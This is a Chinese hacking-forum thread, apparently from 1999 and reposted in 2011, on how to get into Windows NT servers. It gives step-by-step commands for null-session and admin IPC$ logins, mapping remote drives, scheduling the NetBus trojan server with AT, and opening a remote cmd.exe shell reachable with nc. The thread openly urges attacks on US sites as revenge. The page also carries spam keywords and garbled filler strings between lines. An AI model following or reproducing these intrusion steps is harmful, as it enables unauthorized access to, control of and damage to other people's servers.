久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖
汶上信息港
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機(jī)”的幾點(diǎn)補(bǔ)充
[打印本頁]
作者:
雜七雜八
時(shí)間:
2011-1-13 17:03
標(biāo)題:
關(guān)于“怎樣進(jìn)入NT主機(jī)”的幾點(diǎn)補(bǔ)充
《版主頁黑客工具和文章的幾個(gè)問題》中提到:
# y2 ]% N: h% [' r5 ` u
請(qǐng)教,從版主頁上載得PINGER,GRINDER,LETMEIN等,卻不能用,PINGER安裝后,明明安裝前文件有1M多,但安裝完后生成的文件夾中只有PINGER。EXE,40多K,運(yùn)行PINGER,設(shè)置好IP,點(diǎn)PING,彈出一個(gè)窗口(C++。。。),說出錯(cuò),然后關(guān)閉了,何故,是不是安裝有誤? 2。運(yùn)行LETMEIN,彈出以下錯(cuò)誤:連接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否說明需要NETAPI32。DLL文件,哪里有該DLL。 3。USAKILLER 的教學(xué)文章中提到需在WINNT4。0下運(yùn)行以下步驟等,是否要求我的操作系統(tǒng)也是WINNT4。0 ,應(yīng)該不是吧? 4。NC FOR NT 是否要求我的操作系統(tǒng)為NT,還是服務(wù)器的操作系統(tǒng)為NT? 太多的問題需高手回答,我花那么多的時(shí)間和金錢下載這幾M文件卻不能用,實(shí)在窩囊哦, 強(qiáng)烈建議USAKILLER 等高手級(jí)的黑客寫更多的教學(xué)文章,以提高我國(guó)黑客水平。
7 C6 n, s2 ~( l5 q$ D1 d4 C8 Y) A
> 我的機(jī)子MMX166,WIN98,2。5G,32M內(nèi)存。
- g, B9 s5 \7 ~- [ A
5 b. ]8 ?5 V6 z" g$ E
黑客并不神秘,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點(diǎn),輔助相關(guān)的工具,就可以成功。
4 B7 g2 [, Z8 z Q& |( `- v" A
你的問題是,pinger, grinder, letmein等工具必須要在NT上運(yùn)行,我們強(qiáng)烈建議,你一定要安裝NT,對(duì)于你的機(jī)器配制,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存,2G硬盤。
% e4 P& x& k/ V+ z' e/ y5 p
其實(shí),攻擊敵站,利用其操作系統(tǒng)本身的工具就可以了,比如,我們?cè)贜T上攻擊某服務(wù)器,該服務(wù)器為NT4.0,我們將做如下簡(jiǎn)單事情就有可能成功,假設(shè)目標(biāo)NT的IP地址為111.111.111.111,做法如下:
1 N+ \1 w$ a8 W3 I2 ?% J/ w1 c
net use \\111.111.111.111\ipc$ "" /user:""
! N7 G L9 @ W8 b+ p! C
net.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session,如果成功,你可以查看該服務(wù)器上的共享目錄:
3 ~5 z2 e& o/ w) r
net view \\111.111.111.111
7 |8 K) A |$ ]- _- |, Y# U. G9 a: l
當(dāng)然,如果你有該NT管理員密碼,就更好辦了,假設(shè)其管理員Admin密碼為fuck:
" a3 x+ i5 b& x' _# |
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
, g/ a1 u/ m" B! a6 F
命令成功后,幾乎所有目標(biāo)NT上的配制,資源,你都可以在你本地NT上連接遠(yuǎn)程計(jì)算機(jī)來查看或修改:
3 T* V& U5 p, N% O) U% L2 i
1、查看或修改遠(yuǎn)程機(jī)器上的硬盤,假如目標(biāo)NT上有C、D兩個(gè)硬盤:
7 H6 y9 @1 ^6 S- i- l3 @# y
net use x: \\111.111.111.111\c$
/ z8 @8 y3 N" N9 t( R6 Z
net use y: \\111.111.111.111\d$
2 K2 W9 O- Q$ _' R$ e2 B8 o- l
這樣,目標(biāo)NT上的C、D盤分別被影射為你本地的X、Y盤,你想怎么做都可以...
2 y# Q' \& ]" j3 T2 E
2、管理目標(biāo)NT的用戶:
: q% d& u! ~$ I; t# v
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
/ g& C7 T/ x) p4 v: w: H6 n' K0 W1 e
鍵入\\111.111.111.111后,目標(biāo)NT上的所有用戶你想怎么做都可以,和管理你本地的一樣
! l+ A' Y5 ?0 [0 E' O
3、管理目標(biāo)NT的服務(wù)
* P9 C; ]# N7 @* i: i, Y; q( q
選擇“管理工具(公用)”->“服務(wù)器管理”->“計(jì)算機(jī)”->“選擇域”
2 [; y x! e$ F* D: L
這樣你可以管理目標(biāo)NT上的服務(wù),共享目錄
3 S6 l: C% z% Z9 F4 i
4、IIS管理
5 Q4 P4 z: c- F; n, g
選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
# k2 y' W' V7 k0 {9 |' n
目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置
! x3 [6 P+ Y- `1 c7 u( Y
5、事件管理
$ A: a& @+ d0 Z; k' |
“事件查看器”->連接到服務(wù)器->111.111.111.111
, @1 @ S7 W3 b+ J3 P
$ U( T& w! V8 y
還有更多的東西,都可以用NT本身的功能來完成,這些都是95, 98所不能實(shí)現(xiàn)的。
6 ?1 Q/ d# t* J
" U; S! N$ F7 I
當(dāng)然,98,95也能做一些事情,但很麻煩,比如:
4 B7 t& t0 x0 W. {, j
net use \\111.111.111.111\ipc$
2 D0 a' ]! d- E4 R
net use z: \\111.111.111.111\d$
6 K. [! _7 y7 J, F, H
但其后不能帶參數(shù),即改用其他用戶或密碼,系統(tǒng)將用當(dāng)前用戶和密碼去登錄,如果你知道目標(biāo)NT的用戶或密碼,重新啟動(dòng)95, 98,改用該用戶和密碼登錄,方可實(shí)現(xiàn),你可以連接目標(biāo)NT上的共享資源,但不能進(jìn)行管理,如用戶、事件等
9 Z+ ^. ]. G, R7 I. q3 s H% j
0 ?& y) B$ E" c9 M5 T, L+ H
我們強(qiáng)烈建議各位有心要為死難者報(bào)仇,真正的想黑霉國(guó)的站點(diǎn),花點(diǎn)時(shí)間,裝個(gè)NT吧,NT Workstation也可以!
# l1 V* W! D$ }" d$ W9 |; r
這樣,你還可以了解目標(biāo)機(jī)器上能有什么東東供你去用!
2 w& V8 }$ Z' G
% a& C" V" U d: L I* f. ]
; y' r. @5 T# }" d0 x" H
--------------------------------------------------------------------------------
2 D: n! f! J# W
5 d' |+ I/ H$ w# L8 R
>quack于1999-06-12,23:37:44
0 O# j6 A8 E. E
在大作《幾個(gè)有關(guān)黑的問題》中提到:
1 w, L) d9 o+ o u& q# i
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時(shí)候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時(shí)亦無此參數(shù)項(xiàng),不知為是何原因?另,用PINGER查詢到的IP地址若無機(jī)器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對(duì)了,CIH對(duì)NT暫時(shí)無效,假定上傳其它"有益"美國(guó)NT主機(jī)的東東上去,而未傳NETBUS,可否直接在其機(jī)了運(yùn)行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國(guó)機(jī)子,但運(yùn)行程序時(shí)卻是在我的機(jī)上干活,差點(diǎn)把自己斃了!再有,我在微軟的CHAT中常遇到美國(guó)鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個(gè)美國(guó)人,哈!。
& k3 |; k; d" y* {6 R! ~
5 P8 ?# W: y V, V' v
killusa于1999-06-13,03:25:15
8 `- {" @0 w6 z) L+ Y& ?' d. r
在大作《Re: 幾個(gè)有關(guān)黑的問題》中提到:
" k8 T: J1 | h" X! n/ C6 A
9 s" k& y" e! N0 s) Z
letmein.exe 暫時(shí)沒有mypwd參數(shù),十分抱歉
; `4 J1 e. Q6 {3 b/ A7 K9 p
pinger程序,只是利用ping來尋找主機(jī),每臺(tái)NT服務(wù)器有一個(gè)主IP地址,但也可以設(shè)置多個(gè)輔助IP地址,比如有些服務(wù)器供應(yīng)商,一臺(tái)NT服務(wù)器上可以設(shè)置一千多個(gè)IP,每個(gè)IP對(duì)應(yīng)一個(gè)Hostname,而真正能找到主機(jī)名的只有一個(gè)IP地址,就是該主機(jī)的主IP地址,所以有時(shí)顯示只有IP,而無主機(jī)名。另外,有些服務(wù)器是非NT的操作系統(tǒng),有時(shí)將不會(huì)顯示主機(jī)名。當(dāng)然,有時(shí)在服務(wù)器上進(jìn)行一些設(shè)置,也會(huì)出現(xiàn)上面的情況。
% Z- Q, q% D7 M7 ]: Z. |
- @2 M! S2 s5 p/ Q/ D
Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個(gè)程序,所以,netbus.exe是不用上傳的,只需在目的
/ p& [: ?$ r' ^% n3 Z
服務(wù)器上運(yùn)行ntsrv.exe,而在目的服務(wù)器運(yùn)行該程序有很多種方法:
+ x! D9 c4 u% L0 \8 f; x, a( W+ a, A
( j, N1 ?) c2 d4 q8 ] K7 \9 t9 r
1、利用服務(wù)器的 Schedule 服務(wù)來啟動(dòng)schedule 服務(wù)是指在服務(wù)器上定時(shí)運(yùn)行某程序,具體使用方法,可在自己的NT Dos窗口下鍵入以下:
- [* u J3 F8 N( M8 _: \
9 [" E1 L; S- U3 T
C:\>net start schedule
: m8 ?. C5 c1 f" H ~+ j& a! k0 T% S
Schedule 正在啟動(dòng)服務(wù).....
& ~# s% f, o, w1 `! o& O, q9 }
Schedulw 服務(wù)啟動(dòng)成功。
9 X' u( d+ ~/ M, L1 K/ m
C:\>at /?
* V3 q, z$ ~/ K Z6 a
AT 命令排定在特定的日期和時(shí)間運(yùn)行某些命令和程序。
) s) ~; E* R0 @4 ^2 T
運(yùn)行 AT 命令之前必須先啟動(dòng) Schedule 服務(wù)。
9 ?$ g' T. u8 o8 g9 ~
8 y. n* G b- v/ s3 N9 g# D) y/ R
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
/ N2 g# n! H' ?* l
AT [\\computername] time [/INTERACTIVE]
' _/ K$ B) m3 @
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
/ M" J4 I* d. e. }( D7 F8 ?
0 [* V& @/ `! s4 A8 O: L' K# i
\\computername 指定遠(yuǎn)程計(jì)算機(jī)。 如果省略這個(gè)參數(shù)
R+ m. Q8 J; W* T
命令會(huì)被排定在本機(jī)上運(yùn)行。
! R" a$ J. J5 w4 {: z X$ p
id 指定給排定進(jìn)度命令的識(shí)別號(hào)。
( H( V, ^; t3 v
6 ^/ _# Z3 y. j7 I# v6 A
/delete 刪除某個(gè)已排定進(jìn)度的命令。如果省略標(biāo)識(shí),計(jì)算機(jī)上所有已排定進(jìn)度的命令都會(huì)被刪除。
5 A7 G4 j4 Q# M( W
/yes 用于刪除所有作業(yè),且不想在運(yùn)行刪除時(shí)顯示確認(rèn)信息 。
* N# P& h# c' z$ @
time 指定命令運(yùn)行的時(shí)間。
3 [2 k/ B& C' Y7 h" }0 s
/interactive 允許作業(yè)在運(yùn)行時(shí),與用戶通過桌面交互。
. W0 q, e3 l3 E
. \0 U0 x* s& {& A
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運(yùn)行命令。
2 E: N3 P. Z* d" l& I& [
如果省略日期,則默認(rèn)為在每月的本日運(yùn)行。
. x5 D/ F8 [# N, x# Z# ~
' x& R" R# B! z L- n
/next:date[,...] 指定在下一個(gè)指定日期 (如,下周三),運(yùn)行命令。如果省略日期,則默認(rèn)為在每月的本日運(yùn)行。
: R r: p2 r0 R
0 v0 v: {2 Z9 |- e- ^
"command" 準(zhǔn)備運(yùn)行的 Windows NT 命令或批處理文件。
0 ~* s! H. k- S, s% \* i3 A1 K
9 n8 r. k5 w% p) |0 W% d. B; o, b
C:\>
% x* E, o' m0 q! P5 h4 W
* ~6 F. }9 m; \1 l' B& x; C
知道了如何使用AT,再來看看如何在遠(yuǎn)程N(yùn)T上運(yùn)行ntsrv.exe:
0 {. Q, Z& K8 F
1 利用管理員登陸到目的服務(wù)器,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
% X4 O* R B, z, U" k" b: |1 [/ o
2 利用ntsrv.exe啟動(dòng)遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
- P+ k% u3 j$ }+ p! k
3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時(shí)運(yùn)行,當(dāng)然最快運(yùn)行最理想,所以,你可以用letmein.exe得到服務(wù)器的時(shí)間,然后:
4 M. q$ g3 T& u: C9 ]: |" V2 L8 D( y
at \\x.x.x.x 00:00 ntsrv.exe /port:64321
* h/ k8 Q: q. i9 ~. p8 \& ^
其中00:00要改為用letmein.exe得回來的具體時(shí)間+一點(diǎn)容量,等一會(huì)后,再在本地啟動(dòng)netbus.exe,鍵入目的服務(wù)器得ip地址或hostname,連接!具體使用可參照 "How to get in nt",比如第一種方法,你想要在目的服務(wù)器運(yùn)行 LEGION,可以利用netbus得上傳功能,將LEGION上傳至目的服務(wù)器,再用netbus的"Start program",鍵入完整路徑的LEGION運(yùn)行程序,就ok了!第二種方法是利用netbus的“App redirect”功能,啟動(dòng)遠(yuǎn)程telnet服務(wù),如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321,服務(wù)就啟動(dòng)了,然后在本地運(yùn)行:nc x.x.x.x 4321,出現(xiàn)dos啟動(dòng)的畫面就表示連接成功:
; x# p! `: O. T; `7 i1 X% e5 T
Microsoft(R) Windows NT(TM)
8 f6 J3 H d& N9 G# Y- b% c9 i
(C) Copyright 1985-1996 Microsoft Corp.
4 ^3 l$ Z1 V4 v% r' K
C:\>
1 `, k; B# A% J' A. b1 z
2 w7 s* b. m! @; g3 w+ M1 U* A
2、利用web啟動(dòng)ntsrv.exe或其他程序在目的服務(wù)器
4 e0 E' b" I* m
5 _; ~8 r. w; |8 O' K, ~! _! C( K
將ntsrv.exe 或其他運(yùn)行程序Copy到目的服務(wù)器的www可執(zhí)行目錄,如cgi-bin或scripts,然后在瀏覽器鍵入url如:
, X$ e1 u- [' t2 T' p8 P4 V I
http://x.x.x.x/scripts/ntsrv.exe
/port:64321
, o4 t5 n9 R3 ^. E+ b- ^- W
或
http://x.x.x.x/cgi-gin/ntsrv.exe
/port:64321
0 i- }+ x0 F6 a) H/ U. X
該程序就啟動(dòng)了
4 T" o0 z1 O- W$ Y( L
1 t) i5 E1 \1 m% _; f
我只提這幾中方法!
2 G, W. Z( V# e
要成功,必須打好基礎(chǔ)工,對(duì)操作系統(tǒng)充分了解!
' B T5 |( X! o3 o0 g! `
; s# ^2 E4 G W
歡迎光臨 汶上信息港 (http://m.junkejituan.com/)
Powered by Discuz! X3.5